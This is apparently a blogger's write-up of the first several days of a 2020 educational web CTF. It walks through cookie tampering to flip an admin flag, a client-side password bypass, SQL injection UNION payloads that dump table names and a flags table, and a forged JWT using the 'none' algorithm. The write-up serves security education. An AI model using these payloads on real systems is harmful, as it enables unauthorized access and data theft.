Advent of CTF (December 2020)

This CTF was developed by a Dutch tech school called NOVI Hogeschool. Every day a new challenge will be released. It looks like they will get progressively more difficult.

I probably will not get through all of them since I have the SANS Holiday Hack and also THM Advent of Cyber 2 going on at the same time.

When you browse to that address you will see this:

Looks like we need to find Santa’s password. If you check the source code you will see an “odd encoded thing”:

This is Base64:

Alright, let’s try this as Santa’s password:

There are also cool badges for every challenge you solve. Here is Badge 1:

This challenge takes you to a log in page:

First, I tried “username” and “password” to see what would happen:

From here, if you check out the cookies you will see this:

eyJndWVzdCI6InRydWUiLCJhZG1pbiI6ImZhbHNlIn0%3D

What I did was decode this (Base64):

I changed “guest” to “false” and “admin” to “true”, and then coded it back into Base64:

I inserted that new code into the cookie value spot, hit enter, and then refreshed the page:

Another login to infiltrate:

If you try to put in a test username, nothing happens at all. Looking through the source code, I see that it calls a function named checkPass():

So apparently if I add -NOVI to the end of my password, it will work. Also notice the “btoa” part. That signifies that it needs to be in Base64.

The username I chose is “AlienMoo”, so I need to have “AlienMoo-NOVI” encoded to Base64 as my password:

Looks like it worked!

Day 4, and another web challenge. Here is what you will see when you open the link:

After looking around, you can see that the webpage uses JavaScript to create a token (login.js):

This all looks quite confusing, but if you work through the check function, you can piece together what is going on.

The key I currently have is eyJ1c2VyaWQiOjB9.1074

I need to change that to something different to gain access. It is split into two pieces at the period. The first part (eyJ1c2VyaWQiOjB9) is encoded with Base64, and the second part (1074), is a result of the calculations that take place.

Here is a script that reverses things:

Changing the user ID methodically will reveal different results that can be tested.

Luckily, the first iteration, User 1, worked.

This times out VERY quickly, so you need to hurry and copy the flag:

Day 5! Another login form.

Having just done a SQL Injection challenge today over at TryHackMe for their Christmas challenge, I decided to try the same thing again. I assumed the username was admin:

After submitting it, I got the following error:

Error description: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘admin’’ at line 1

At this point I thought about using SqlMap since it says we are allowed to use a “tool”, but then in the rules it specifically says you can’t use SqlMap, so I kept doing it by hand. I tried a few more variations and eventually ended up with this:

Here is our next web challenge for today:

It took me much longer than I’d like to admit to realize that I should be searching for “flag”:

So this pulls something up, a table with three columns, but only the first 5 characters are shown for legal reasons.

I started trying some SQL Injection again:

I am going to try to show the contents of each column using this command:

‘ UNION SELECT table_name, 2, 3 FROM information_schema.tables #

Nice, that worked. Look down at the bottom:

Now we can try to show the “flags” table:

‘ UNION SELECT (SELECT * FROM flags), 2, 3 #

I appreciated these last two SQL challenges since I am trying to improve this area of my education.

Still working with the web theme, here we have what appears to be another database challenge. I tried to search for “mice” and just got “Why?” returned to me:

Any other plain text word I tried had the same result. I’m thinking it’s another SQL challenge. Not my favorite, but I do need the practice.

I was gearing up for some intense morning Google, but this one actually turned out to be quite simple:

Hmm, robots? I headed straight to the /robots.txt directory to see if there were any hints there:

At /encryption/is/a/right I found this:

This is Base 64:

At /fnagn/unf/znal/cynprf/gb/tb I found this:

From here I assume you have to decrypt the directory. It turned out to be Rot13:

From here you have to infiltrate the forum as admin:

I tried user:admin and password:password, and got this back:

I used Burp to intercept my next attempt:

I sent this request to the intruder to attempt an attack, but then I remembered there was a rule against brute forcing and tried to find another way.

Eventually, after looking at the message “Hey user, your password is incorrect”, I decided to try user:user password:incorrect.

That returned something a bit different, telling me that the Naughty List was currently empty.

Now that I’m actually in an account, I can do a little exploring. The cookie seems to hold the key:

It can be decoded with Base64

If you look at the little “JWT”, you can see that this is a JSON Web Token. There are some vulnerabilities to these that you can about read, HERE.

If I change the role of “user” to “admin”, I should have some more permissions.

The first thing to do is change the beginning part, {“typ”:”JWT”,”alg”:”HS256”}. I’m going to add a “none” as the algorithm, which will make it look like the token has already been verified.

{“typ”:”JWT”,”alg”:”none”}

Then I need to add on the second part of the token.

{“auth”:28961,”text”:”I do love a good puzzle.”,”role”:”admin”,”iat”:1607717857}

And combine them into Base64 (remove =), with a period separating the portions.

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoyODk2MSwidGV4dCI6IkkgZG8gbG92ZSBhIGdvb2QgcHV6emxlLiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYwNzcxNzg1N30.

Paste this into the cookie section and then reload the page.

And that’s as far as I got this year. I really did value the opportunity to work on my SQL Injection, despite the fact that I grumbled to myself the entire way through them.

Happy Hacking! ❤

CTF Writeups to facilitate cyber education.